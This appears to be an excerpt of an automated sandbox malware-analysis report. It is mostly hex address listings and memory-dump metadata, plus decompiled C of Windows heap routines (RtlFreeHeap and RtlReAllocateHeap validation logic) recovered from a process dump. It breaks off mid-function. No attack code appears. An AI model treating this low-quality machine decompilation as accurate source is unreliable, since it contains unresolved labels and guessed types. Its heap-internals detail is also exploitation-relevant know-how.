                                                0x009a0081
                                                0x009a0081
                                                0x009a0263
                                                0x009a0266
                                                0x00000000
                                                0x00000000
                                                0x009a0268
                                                0x009a026a
                                                0x009a026c
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x009a026c
                                                0x00000000
                                                0x009a006c
                                                0x009a024a
                                                0x009a024c
                                                0x009a024f
                                                0x009a0252
                                                0x009a0254
                                                0x009a00a9
                                                0x009a00ac
                                                0x009a00af
                                                0x009a00b2
                                                0x009a00b5
                                                0x009a00b8
                                                0x009a00ba
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x009a00c4
                                                0x009a00c4
                                                0x009a00c7
                                                0x009a00c9
                                                0x009a00dd
                                                0x009a00cb
                                                0x009a00cb
                                                0x009a00ce
                                                0x009a00d1
                                                0x009a00d3
                                                0x009a00d5
                                                0x009a00d5
                                                0x009a00d5
                                                0x009a00d8
                                                0x009a00d8
                                                0x009a00e6
                                                0x009a00e9
                                                0x009a00eb
                                                0x009a0233
                                                0x009a0233
                                                0x00000000
                                                0x009a00f1
                                                0x009a00f3
                                                0x009a00f6
                                                0x009a00f8
                                                0x009a010b
                                                0x009a00fa
                                                0x009a00fa
                                                0x009a00fc
                                                0x009a00ff
                                                0x009a0101
                                                0x009a0103
                                                0x009a0103
                                                0x009a0103
                                                0x009a0106
                                                0x009a0106
                                                0x009a0116
                                                0x009a0118
                                                0x009a0124
                                                0x009a0127
                                                0x009a012a
                                                0x009a0182
                                                0x009a0182
                                                0x009a0193
                                                0x009a0199
                                                0x009a01aa
                                                0x009a01ae
                                                0x009a01ae
                                                0x009a01b0
                                                0x009a01c8
                                                0x009a01cb
                                                0x009a01cd
                                                0x009a01f9
                                                0x009a01f9
                                                0x009a01ff
                                                0x009a0210
                                                0x009a0217
                                                0x009a0217
                                                0x009a0201
                                                0x009a0201
                                                0x009a0208
                                                0x009a0208
                                                0x009a01cf
                                                0x009a01d6
                                                0x009a01d6
                                                0x009a01d8
                                                0x009a01e8
                                                0x009a01ef
                                                0x009a01da
                                                0x009a01da
                                                0x009a01da
                                                0x009a01da
                                                0x009a01d8
                                                0x009a021d
                                                0x009a021f
                                                0x009a0222
                                                0x009a0226
                                                0x009a0229
                                                0x009a022b
                                                0x009a022b
                                                0x009a0230
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x009a01b2
                                                0x009a01b2
                                                0x009a01b2
                                                0x009a01b4
                                                0x00000000
                                                0x00000000
                                                0x009a01b6
                                                0x009a01bd
                                                0x009a01bf
                                                0x009a01c0
                                                0x009a01c2
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x009a01c2
                                                0x009a01c4
                                                0x009a01c6
                                                0x009a0238
                                                0x009a0238
                                                0x009a0238
                                                0x00000000
                                                0x009a0238
                                                0x00000000
                                                0x009a01c6
                                                0x009a0130
                                                0x009a0133
                                                0x00000000
                                                0x00000000
                                                0x009a0135
                                                0x009a0138
                                                0x009a013c
                                                0x009a013f
                                                0x009a0141
                                                0x009a0141
                                                0x009a0141
                                                0x009a0146
                                                0x009a0177
                                                0x009a0177
                                                0x009a017a
                                                0x00000000
                                                0x00000000
                                                0x009a014b
                                                0x009a014d
                                                0x009a0161
                                                0x009a014f
                                                0x009a014f
                                                0x009a0152
                                                0x009a0155
                                                0x009a0157
                                                0x009a0159
                                                0x009a0159
                                                0x009a0159
                                                0x009a015c
                                                0x009a015c
                                                0x009a016d
                                                0x009a016f
                                                0x00000000
                                                0x009a0175
                                                0x009a0175
                                                0x00000000
                                                0x009a0175
                                                0x00000000
                                                0x009a016f
                                                0x00000000
                                                0x009a011a
                                                0x009a011d
                                                0x00000000
                                                0x009a011d
                                                0x009a0118
                                                0x009a00eb
                                                0x009a00a7
                                                0x009a008f
                                                0x009a008f
                                                0x009a0096
                                                0x009a0098
                                                0x00000000
                                                0x009a0098
                                                0x009a0055
                                                0x00000000
                                                0x009a0055
                                                0x009a0010
                                                0x009a0015
                                                0x009a0017
                                                0x00000000
                                                0x00000000
                                                0x009a0021
                                                0x00000000
                                                0x009a0021
                                                0x0099ff2e
                                                0x0099ff3b
                                                0x0099ff3b
                                                0x0099ff3e
                                                0x00000000
                                                0x00000000
                                                0x0099ff33
                                                0x0099ff35
                                                0x0099ff37
                                                0x0099ff4a
                                                0x0099ff4a
                                                0x0099ff4b
                                                0x0099ff4e
                                                0x0099ff50
                                                0x0099ff53
                                                0x0099ff57
                                                0x0099ff5a
                                                0x0099ff5c
                                                0x0099ff5c
                                                0x0099ff5c
                                                0x0099ff61
                                                0x0099ff64
                                                0x0099ff66
                                                0x0099ff6b
                                                0x0099ff6e
                                                0x0099ff75
                                                0x0099ff77
                                                0x0099ff79
                                                0x0099ff79
                                                0x0099ff79
                                                0x0099ff79
                                                0x0099ff7f
                                                0x0099ff82
                                                0x00000000
                                                0x0099ff84
                                                0x0099ff84
                                                0x0099ff87
                                                0x0099ff8a
                                                0x0099ff8c
                                                0x0099ff8c
                                                0x0099ff8c
                                                0x0099ff8d
                                                0x0099ff90
                                                0x0099ff93
                                                0x0099ffd5
                                                0x0099ffd8
                                                0x0099ffde
                                                0x0099ffde
                                                0x00000000
                                                0x0099ffde
                                                0x0099ffda
                                                0x00000000
                                                0x0099ff95
                                                0x0099ff95
                                                0x0099ff98
                                                0x0099ffc9
                                                0x0099ffcf
                                                0x0099ffe1
                                                0x0099ffe1
                                                0x0099ffec
                                                0x0099fff9
                                                0x0099fff9
                                                0x00000000
                                                0x0099fff9
                                                0x0099ff9a
                                                0x0099ff9e
                                                0x0099ffb0
                                                0x0099ffa0
                                                0x0099ffa0
                                                0x0099ffa3
                                                0x0099ffa6
                                                0x0099ffa8
                                                0x0099ffa8
                                                0x0099ffa8
                                                0x0099ffab
                                                0x0099ffab
                                                0x0099ffba
                                                0x0099ffba
                                                0x0099ffbc
                                                0x00000000
                                                0x0099ffbe
                                                0x0099ffc4
                                                0x00000000
                                                0x0099ffc4
                                                0x0099ffbc
                                                0x0099ff93
                                                0x0099ff82
                                                0x0099ff39
                                                0x0099ff39
                                                0x0099ff40
                                                0x0099ff42
                                                0x00000000
                                                0x0099ff42
                                                0x0099fef4
                                                0x0099fe58
                                                0x0099feb0
                                                0x0099feb4
                                                0x00000000
                                                0x0099fec9
                                                0x00000000
                                                0x0099fec9
                                                0x0099fe5a
                                                0x0099fe5c
                                                0x0099fe6f
                                                0x0099fe5e
                                                0x0099fe64
                                                0x0099fe64
                                                0x0099fe75
                                                0x00000000
                                                0x00000000
                                                0x0099fe7c
                                                0x0099fe92
                                                0x0099fe97
                                                0x00000000
                                                0x00000000
                                                0x0099fe99
                                                0x0099fea0
                                                0x00000000
                                                0x00000000
                                                0x0099fea2
                                                0x0099fea5
                                                0x0099feab
                                                0x0099feae
                                                0x00000000
                                                0x0099feae
                                                0x0099fe7e
                                                0x0099fe83
                                                0x0099fe8b
                                                0x00000000
                                                0x0099fe8d
                                                0x0099fe8d
                                                0x00000000
                                                0x0099fe8d
                                                0x0099fe8b
                                                0x009a0454
                                                0x009a0457
                                                0x009a0457
                                                0x009a0460
                                                0x009a0463
                                                0x009a0463
                                                0x00000000
                                                0x009a0463

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2149474689.00000000008E0000.00000040.00000001.sdmp, Offset: 008D0000, based on PE: true
                                                • Associated: 00000007.00000002.2149468638.00000000008D0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149692494.00000000009C0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149700219.00000000009D0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149713288.00000000009D4000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149723271.00000000009D7000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149730125.00000000009E0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149841483.0000000000A40000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID:
                                                • String ID: Free Heap block %p modified at %p after it was freed$HEAP: $HEAP[%wZ]: $Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x)$Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x)$Heap block at %p has corrupted PreviousSize (%lx)$Heap block at %p has incorrect segment offset (%x)$Heap block at %p is not last block in segment (%p)$Heap entry %p has incorrect PreviousSize field (%04x instead of %04x)
                                                • API String ID: 0-3591852110
                                                • Opcode ID: 38b744f432721b996dca95211f3fb143b0932951f0009d8a926ed07152b4220b
                                                • Instruction ID: 01eed98ab89dfa93efb9151e3ec15f8b62843bcc5fb026ad0fedc63929708235
                                                • Opcode Fuzzy Hash: 38b744f432721b996dca95211f3fb143b0932951f0009d8a926ed07152b4220b
                                                • Instruction Fuzzy Hash: 8062E170A00756DFCB24CF69C490ABAB7F5FF8A304B14846DE9868B652D734ED41CB90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 009A098E, Relevance: 11.7, Strings: 9, Instructions: 401COMMONCrypto
                                                Download Yara Rule
                                                C-Code - Quality: 59%
                                                			E009A098E(void* __ecx, unsigned int __edx, signed int _a4, char _a8) {
				signed int _v8;
				signed int _v12;
				signed int* _v16;
				signed int _v20;
				signed int _v24;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int* _t165;
				intOrPtr _t168;
				signed short _t181;
				intOrPtr _t183;
				signed int* _t204;
				signed int _t209;
				signed int _t214;
				signed int* _t216;
				signed int _t226;
				signed int _t228;
				signed int _t233;
				intOrPtr _t235;
				intOrPtr _t246;
				intOrPtr _t257;
				signed int _t280;
				signed int* _t281;
				signed int* _t282;
				signed short _t284;
				signed short _t286;
				signed char _t288;
				intOrPtr* _t298;
				signed int _t309;
				signed int _t310;
				signed int* _t311;
				unsigned int _t312;
				signed int* _t313;
				signed int _t314;
				signed int _t315;
				intOrPtr _t316;
				signed int _t317;
				signed int _t318;
				signed int _t319;

				_t308 = __edx;
				_t311 = _a4;
				_v12 = 0;
				_v8 = 0;
				_v16 = _t311;
				if(E0099FB7A(__ecx, __edx, _t311, 0) == 0) {
					L84:
					E009A06F9(_v16);
					_t337 = _v8;
					if(_v8 != 0) {
						_a4 = _a4 & 0x00000000;
						E00904167(_t308, _t337, 0xffffffff,  &_v8,  &_a4, 0x8000);
					}
					L48:
					return 0;
				}
				if(_a8 != 0 || (_t311[0x10] & 0x20000000) != 0) {
					_t308 = 0;
					_t165 =  &(_t311[0x31]);
					_t280 =  *_t165;
					_a8 = 0;
					_v24 = 0;
					while(_t165 != _t280) {
						_t280 =  *_t280;
						_a4 =  *_t313 & 0x0000ffff;
						_t288 = _t313[0];
						_v16 = _t313;
						__eflags = _t288 & 0x00000001;
						if((_t288 & 0x00000001) != 0) {
							_t168 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
							__eflags =  *(_t168 + 0xc);
							if( *(_t168 + 0xc) == 0) {
								_push("HEAP: ");
								E0094373B();
							} else {
								E0094373B("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0xc)) + 0xc)) + 0x2c);
							}
							_push(_t313);
							E0094373B("dedicated (%04x) free list element %p is marked busy\n", _a4);
							L22:
							__eflags = _t311[0x13];
							if(_t311[0x13] != 0) {
								_t313[0] = _t313[0] ^ _t313[0] ^  *_t313;
								 *_t313 =  *_t313 ^ _t311[0x14];
							}
							goto L84;
						}
						_t181 =  *_t313 & 0x0000ffff;
						__eflags = _t181 - _v24;
						if(_t181 < _v24) {
							_t183 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
							__eflags =  *(_t183 + 0xc);
							if( *(_t183 + 0xc) == 0) {
								_push("HEAP: ");
								E0094373B();
							} else {
								E0094373B("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0xc)) + 0xc)) + 0x2c);
							}
							E0094373B("Non-Dedicated free list element %p is out of order\n", _t313);
							goto L22;
						}
						_t308 = 0;
						_v24 = _t181 & 0x0000ffff;
						__eflags = _t311[0x13];
						if(_t311[0x13] != 0) {
							_t313[0] = _t313[0] ^ _t288 ^  *_t313;
							 *_t313 =  *_t313 ^ _t311[0x14];
							__eflags =  *_t313;
						}
						_t29 =  &_a8;
						 *_t29 = _a8 + 1;
						__eflags =  *_t29;
						_t165 =  &(_t311[0x31]);
					}
					_a4 = 0x208 + (_t311[0x22] & 0x0000ffff) * 4;
					if( *0x9d92a4 != 0 && _t311[0x30] != _t308) {
						_push(4);
						_push(0x1000);
						_push( &_a4);
						_push(0);
						_push( &_v8);
						if(E008EFAD0(0xffffffff) >= 0) {
							_v12 = _v8 + 0x204;
						}
					}
					_t204 =  &(_t311[0x28]);
					_t314 =  *_t204;
					while(_t204 != _t314) {
						__eflags = _t311[0x13];
						_t281 = _t314 + 0x18;
						if(_t311[0x13] != 0) {
							 *_t281 =  *_t281 ^ _t311[0x14];
							__eflags = _t281[0] - (_t281[0] ^ _t281[0] ^  *_t281);
							if(__eflags != 0) {
								_push(0);
								_push(_t281);
								_push(_t311);
								E0099F8EE(_t281, _t311, _t314, __eflags);
							}
						}
						_t295 = _v12;
						__eflags = _t295;
						if(_t295 == 0) {
							L39:
							__eflags =  *(_t314 + 0x1a) & 0x00000004;
							if(( *(_t314 + 0x1a) & 0x00000004) == 0) {
								L41:
								__eflags = _t311[0x13];
								if(_t311[0x13] != 0) {
									_t281[0] = _t281[0] ^ _t281[0] ^  *_t281;
									 *_t281 =  *_t281 ^ _t311[0x14];
									__eflags =  *_t281;
								}
								_t314 =  *_t314;
								_t204 =  &(_t311[0x28]);
								continue;
							}
							_t209 = E0098579A(_t295, _t311, _t281);
							__eflags = _t209;
							if(_t209 == 0) {
								__eflags = _t311[0x13];
								if(_t311[0x13] != 0) {
									 *(_t314 + 0x1b) =  *(_t314 + 0x1a) ^  *(_t314 + 0x19) ^  *(_t314 + 0x18);
									_t95 = _t314 + 0x18;
									 *_t95 =  *(_t314 + 0x18) ^ _t311[0x14];
									__eflags =  *_t95;
								}
								goto L48;
							}
							goto L41;
						} else {
							_t214 =  *(_t314 + 0xa) & 0x0000ffff;
							__eflags = _t214;
							if(_t214 == 0) {
								goto L39;
							}
							__eflags = _t214 & 0x00008000;
							if((_t214 & 0x00008000) == 0) {
								__eflags = _t214 & 0x00000800;
								if((_t214 & 0x00000800) != 0) {
									goto L39;
								}
								__eflags = _t214 - _t311[0x22];
								if(_t214 >= _t311[0x22]) {
									goto L39;
								}
								L38:
								_t216 = _t295 + (_t214 & 0x0000ffff) * 4;
								_t295 =  *(_t314 + 0x10) >> 3;
								 *_t216 =  *_t216 + ( *(_t314 + 0x10) >> 3);
								__eflags =  *_t216;
								goto L39;
							}
							_t214 = _t214 & 0x00007fff;
							_t295 = 0x81;
							__eflags = _t214 - 0x81;
							if(_t214 >= 0x81) {
								goto L39;
							}
							_t295 = _v8;
							goto L38;
						}
					}
					_v20 = _v20 & 0x00000000;
					_v24 = _v24 & 0x00000000;
					_t282 =  &(_t311[0x2a]);
					_t315 =  *_t282;
					while(_t315 != _t282) {
						_t226 = E0099FDDD(_t311, _t315 - 0x10, 0,  &_v20,  &_v24,  &_v16, _v12, _v8);
						__eflags = _t226;
						if(_t226 == 0) {
							goto L84;
						}
						_t315 =  *_t315;
					}
					_t316 = _a8;
					_v16 = _t311;
					if(_t316 == _v20) {
						__eflags = _t311[0x1e] - _v24;
						if(_t311[0x1e] == _v24) {
							_t228 = _v8;
							__eflags = _t228;
							if(_t228 == 0) {
								goto L74;
							}
							_t317 = _t311[0x30];
							__eflags = _t317;
							if(_t317 == 0) {
								L68:
								_t318 = _t311[0x23];
								__eflags = _t318;
								if(__eflags == 0) {
									L73:
									_a4 = 0;
									E00904167(_t308, __eflags, 0xffffffff,  &_v8,  &_a4, 0x8000);
									goto L74;
								}
								_t233 = _t311[0x22] & 0x0000ffff;
								_t284 = 1;
								_t308 = 1;
								__eflags = 1 - _t233;
								if(__eflags >= 0) {
									goto L73;
								}
								_t312 = _v12;
								while(1) {
									_t309 = _t284 & 0x0000ffff;
									_t308 =  *(_t312 + _t309 * 4);
									_t318 = _t318 + 0x40;
									__eflags =  *(_t312 + _t309 * 4) -  *((intOrPtr*)(_t318 + 8));
									if( *(_t312 + _t309 * 4) !=  *((intOrPtr*)(_t318 + 8))) {
										break;
									}
									_t284 = _t284 + 1;
									__eflags = _t284 - _t233;
									if(__eflags < 0) {
										continue;
									}
									goto L73;
								}
								_t235 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
								__eflags =  *(_t235 + 0xc);
								if( *(_t235 + 0xc) == 0) {
									_push("HEAP: ");
									E0094373B();
								} else {
									E0094373B("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0xc)) + 0xc)) + 0x2c);
								}
								_t298 = _t312 + (_t284 & 0x0000ffff) * 4;
								_push(_t298);
								_push( *_t298);
								_t319 = _t318 + 0x10;
								__eflags = _t319;
								_push( *((intOrPtr*)(_t319 - 8)));
								_push(_t319);
								E0094373B("Tag %04x (%ws) size incorrect (%x != %x) %p\n", _t284 & 0x0000ffff);
								goto L84;
							}
							_t286 = 1;
							__eflags = 1;
							while(1) {
								_t310 = _t286 & 0x0000ffff;
								_t308 =  *(_t228 + _t310 * 4);
								_t317 = _t317 + 0xc;
								__eflags =  *(_t228 + _t310 * 4) -  *((intOrPtr*)(_t317 + 8));
								if( *(_t228 + _t310 * 4) !=  *((intOrPtr*)(_t317 + 8))) {
									break;
								}
								_t286 = _t286 + 1;
								_t308 = 0x81;
								__eflags = _t286 - 0x81;
								if(_t286 < 0x81) {
									continue;
								}
								goto L68;
							}
							_t246 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
							__eflags =  *(_t246 + 0xc);
							if( *(_t246 + 0xc) == 0) {
								_push("HEAP: ");
								E0094373B();
							} else {
								E0094373B("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0xc)) + 0xc)) + 0x2c);
							}
							_push( *((intOrPtr*)(_v8 + (_t286 & 0x0000ffff) * 4)));
							_push( *((intOrPtr*)(_t317 + 8)));
							E0094373B("Pseudo Tag %04x size incorrect (%x != %x) %p\n", _t286 & 0x0000ffff);
							goto L84;
						}
						_t257 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
						__eflags =  *(_t257 + 0xc);
						if( *(_t257 + 0xc) == 0) {
							_push("HEAP: ");
							E0094373B();
						} else {
							E0094373B("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0xc)) + 0xc)) + 0x2c);
						}
						_push(_t311[0x1e]);
						_push(_v24);
						_push("Total size of free blocks in arena (%ld) does not match number total in heap header (%ld)\n");
						L57:
						E0094373B();
						goto L84;
					}
					if( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0xc)) == 0) {
						_push("HEAP: ");
						E0094373B();
					} else {
						E0094373B("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0xc)) + 0xc)) + 0x2c);
					}
					_push(_t316);
					_push(_v20);
					_push("Number of free blocks in arena (%ld) does not match number in the free lists (%ld)\n");
					goto L57;
				} else {
					L74:
					return 1;
				}
			}












































                                                0x009a098e
                                                0x009a0999
                                                0x009a09a0
                                                0x009a09a3
                                                0x009a09a6
                                                0x009a09b0
                                                0x009a0e2c
                                                0x009a0e2f
                                                0x009a0e34
                                                0x009a0e38
                                                0x009a0e3e
                                                0x009a0e51
                                                0x009a0e51
                                                0x009a0c22
                                                0x00000000
                                                0x009a0c22
                                                0x009a09ba
                                                0x009a09c9
                                                0x009a09cb
                                                0x009a09d1
                                                0x009a09d3
                                                0x009a09d6
                                                0x009a0a47
                                                0x009a0a01
                                                0x009a0a03
                                                0x009a0a06
                                                0x009a0a09
                                                0x009a0a0c
                                                0x009a0a0f
                                                0x009a0aa7
                                                0x009a0aaa
                                                0x009a0aae
                                                0x009a0ad0
                                                0x009a0ad5
                                                0x009a0ab0
                                                0x009a0ac8
                                                0x009a0acd
                                                0x009a0adb
                                                0x009a0ae4
                                                0x009a0aec
                                                0x009a0aec
                                                0x009a0af0
                                                0x009a0afe
                                                0x009a0b04
                                                0x009a0b04
                                                0x00000000
                                                0x009a0af0
                                                0x009a0a15
                                                0x009a0a18
                                                0x009a0a1c
                                                0x009a0b11
                                                0x009a0b14
                                                0x009a0b18
                                                0x009a0b3a
                                                0x009a0b3f
                                                0x009a0b1a
                                                0x009a0b32
                                                0x009a0b37
                                                0x009a0b4b
                                                0x00000000
                                                0x009a0b51
                                                0x009a0a25
                                                0x009a0a27
                                                0x009a0a2a
                                                0x009a0a2d
                                                0x009a0a36
                                                0x009a0a3c
                                                0x009a0a3c
                                                0x009a0a3c
                                                0x009a0a3e
                                                0x009a0a3e
                                                0x009a0a3e
                                                0x009a0a41
                                                0x009a0a41
                                                0x009a0a60
                                                0x009a0a63
                                                0x009a0a6d
                                                0x009a0a6f
                                                0x009a0a77
                                                0x009a0a78
                                                0x009a0a7d
                                                0x009a0a87
                                                0x009a0a91
                                                0x009a0a91
                                                0x009a0a87
                                                0x009a0a94
                                                0x009a0a9a
                                                0x009a0bf0
                                                0x009a0b54
                                                0x009a0b58
                                                0x009a0b5b
                                                0x009a0b60
                                                0x009a0b6a
                                                0x009a0b6d
                                                0x009a0b6f
                                                0x009a0b71
                                                0x009a0b72
                                                0x009a0b73
                                                0x009a0b73
                                                0x009a0b6d
                                                0x009a0b78
                                                0x009a0b7b
                                                0x009a0b7d
                                                0x009a0bc1
                                                0x009a0bc1
                                                0x009a0bc5
                                                0x009a0bd2
                                                0x009a0bd2
                                                0x009a0bd6
                                                0x009a0be0
                                                0x009a0be6
                                                0x009a0be6
                                                0x009a0be6
                                                0x009a0be8
                                                0x009a0bea
                                                0x00000000
                                                0x009a0bea
                                                0x009a0bc9
                                                0x009a0bce
                                                0x009a0bd0
                                                0x009a0c0a
                                                0x009a0c0e
                                                0x009a0c19
                                                0x009a0c1f
                                                0x009a0c1f
                                                0x009a0c1f
                                                0x009a0c1f
                                                0x00000000
                                                0x009a0c0e
                                                0x00000000
                                                0x009a0b7f
                                                0x009a0b7f
                                                0x009a0b83
                                                0x009a0b86
                                                0x00000000
                                                0x00000000
                                                0x009a0b88
                                                0x009a0b8d
                                                0x009a0ba3
                                                0x009a0ba8
                                                0x00000000
                                                0x00000000
                                                0x009a0baa
                                                0x009a0bb1
                                                0x00000000
                                                0x00000000
                                                0x009a0bb3
                                                0x009a0bb6
                                                0x009a0bbc
                                                0x009a0bbf
                                                0x009a0bbf
                                                0x00000000
                                                0x009a0bbf
                                                0x009a0b8f
                                                0x009a0b94
                                                0x009a0b99
                                                0x009a0b9c
                                                0x00000000
                                                0x00000000
                                                0x009a0b9e
                                                0x00000000
                                                0x009a0b9e
                                                0x009a0b7d
                                                0x009a0bf8
                                                0x009a0bfc
                                                0x009a0c00
                                                0x009a0c06
                                                0x009a0c51
                                                0x009a0c42
                                                0x009a0c47
                                                0x009a0c49
                                                0x00000000
                                                0x00000000
                                                0x009a0c4f
                                                0x009a0c4f
                                                0x009a0c55
                                                0x009a0c58
                                                0x009a0c5e
                                                0x009a0cb3
                                                0x009a0cb6
                                                0x009a0cff
                                                0x009a0d04
                                                0x009a0d06
                                                0x00000000
                                                0x00000000
                                                0x009a0d08
                                                0x009a0d0e
                                                0x009a0d10
                                                0x009a0d2e
                                                0x009a0d2e
                                                0x009a0d34
                                                0x009a0d36
                                                0x009a0d60
                                                0x009a0d6f
                                                0x009a0d72
                                                0x00000000
                                                0x009a0d72
                                                0x009a0d38
                                                0x009a0d41
                                                0x009a0d42
                                                0x009a0d44
                                                0x009a0d47
                                                0x00000000
                                                0x00000000
                                                0x009a0d49
                                                0x009a0d4c
                                                0x009a0d4c
                                                0x009a0d4f
                                                0x009a0d52
                                                0x009a0d55
                                                0x009a0d58
                                                0x00000000
                                                0x00000000
                                                0x009a0d5a
                                                0x009a0d5b
                                                0x009a0d5e
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x009a0d5e
                                                0x009a0ddb
                                                0x009a0dde
                                                0x009a0de1
                                                0x009a0e03
                                                0x009a0e08
                                                0x009a0de3
                                                0x009a0dfb
                                                0x009a0e00
                                                0x009a0e11
                                                0x009a0e14
                                                0x009a0e15
                                                0x009a0e17
                                                0x009a0e17
                                                0x009a0e1a
                                                0x009a0e1d
                                                0x009a0e24
                                                0x00000000
                                                0x009a0e29
                                                0x009a0d14
                                                0x009a0d14
                                                0x009a0d15
                                                0x009a0d15
                                                0x009a0d18
                                                0x009a0d1b
                                                0x009a0d1e
                                                0x009a0d21
                                                0x00000000
                                                0x00000000
                                                0x009a0d23
                                                0x009a0d24
                                                0x009a0d29
                                                0x009a0d2c
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x009a0d2c
                                                0x009a0d86
                                                0x009a0d89
                                                0x009a0d8c
                                                0x009a0dae
                                                0x009a0db3
                                                0x009a0d8e
                                                0x009a0da6
                                                0x009a0dab
                                                0x009a0dbf
                                                0x009a0dc2
                                                0x009a0dcb
                                                0x00000000
                                                0x009a0dd0
                                                0x009a0cbe
                                                0x009a0cc1
                                                0x009a0cc5
                                                0x009a0ce7
                                                0x009a0cec
                                                0x009a0cc7
                                                0x009a0cdf
                                                0x009a0ce4
                                                0x009a0cf2
                                                0x009a0cf5
                                                0x009a0cf8
                                                0x009a0ca3
                                                0x009a0ca3
                                                0x00000000
                                                0x009a0ca8
                                                0x009a0c6d
                                                0x009a0c8f
                                                0x009a0c94
                                                0x009a0c6f
                                                0x009a0c87
                                                0x009a0c8c
                                                0x009a0c9a
                                                0x009a0c9b
                                                0x009a0c9e
                                                0x00000000
                                                0x009a0d77
                                                0x009a0d77
                                                0x00000000
                                                0x009a0d77

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2149474689.00000000008E0000.00000040.00000001.sdmp, Offset: 008D0000, based on PE: true
                                                • Associated: 00000007.00000002.2149468638.00000000008D0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149692494.00000000009C0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149700219.00000000009D0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149713288.00000000009D4000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149723271.00000000009D7000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149730125.00000000009E0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149841483.0000000000A40000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID:
                                                • String ID: HEAP: $HEAP[%wZ]: $Non-Dedicated free list element %p is out of order$Number of free blocks in arena (%ld) does not match number in the free lists (%ld)$Pseudo Tag %04x size incorrect (%x != %x) %p$RtlFreeHeap$Tag %04x (%ws) size incorrect (%x != %x) %p$Total size of free blocks in arena (%ld) does not match number total in heap header (%ld)$dedicated (%04x) free list element %p is marked busy
                                                • API String ID: 0-3316276410
                                                • Opcode ID: 59494a7069cea8f3864a4bf095b52c490e15b319346fb022f5df18655a2e4263
                                                • Instruction ID: 159b014d93bb0935a88241b32ebe639679645311b2a24f7e9e1278ad239d962d
                                                • Opcode Fuzzy Hash: 59494a7069cea8f3864a4bf095b52c490e15b319346fb022f5df18655a2e4263
                                                • Instruction Fuzzy Hash: 18F1DF71600645EFDB20DF68C481FBAB7F8FF8A714F548459E8959B282C734AE44DBA0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 009A1238, Relevance: 10.3, Strings: 8, Instructions: 324COMMONCrypto
                                                Download Yara Rule
                                                C-Code - Quality: 65%
                                                			E009A1238(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t123;
				signed int _t124;
				void* _t130;
				intOrPtr _t132;
				signed int _t145;
				signed int _t146;
				signed int _t147;
				intOrPtr _t151;
				intOrPtr _t163;
				signed int _t173;
				signed int _t174;
				signed int _t178;
				short _t184;
				signed int _t193;
				signed int _t194;
				intOrPtr _t197;
				intOrPtr _t219;
				short* _t233;
				void* _t246;
				intOrPtr _t248;
				signed int _t251;
				signed int _t253;
				signed int _t254;
				void* _t255;
				void* _t256;

				_t246 = __edx;
				_push(0x18);
				_push(0x8fd158);
				_t123 = E008FDF5C(__ebx, __edi, __esi);
				_t248 =  *((intOrPtr*)(_t255 + 8));
				 *((intOrPtr*)(_t255 + 8)) = _t248;
				 *((char*)(_t255 - 0x19)) = 0;
				 *(_t255 - 0x24) = 0;
				if(( *(_t248 + 0x44) & 0x01000000) == 0) {
					 *(_t255 - 4) = 0;
					 *(_t255 - 4) = 1;
					_t232 = "RtlReAllocateHeap";
					_t124 = E009085CA(_t248, "RtlReAllocateHeap");
					__eflags = _t124;
					if(_t124 != 0) {
						 *(_t255 + 0xc) =  *(_t255 + 0xc) |  *(_t248 + 0x44) | 0x10000100;
						_t251 =  *(_t255 + 0x14);
						__eflags = _t251;
						if(_t251 == 0) {
							_t235 = 1;
							__eflags = 1;
						} else {
							_t235 = _t251;
						}
						_t130 = ( *((intOrPtr*)(_t248 + 0x98)) + _t235 &  *(_t248 + 0x9c)) + 8;
						__eflags = _t130 - _t251;
						if(_t130 < _t251) {
							L66:
							_t132 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
							__eflags =  *(_t132 + 0xc);
							if( *(_t132 + 0xc) == 0) {
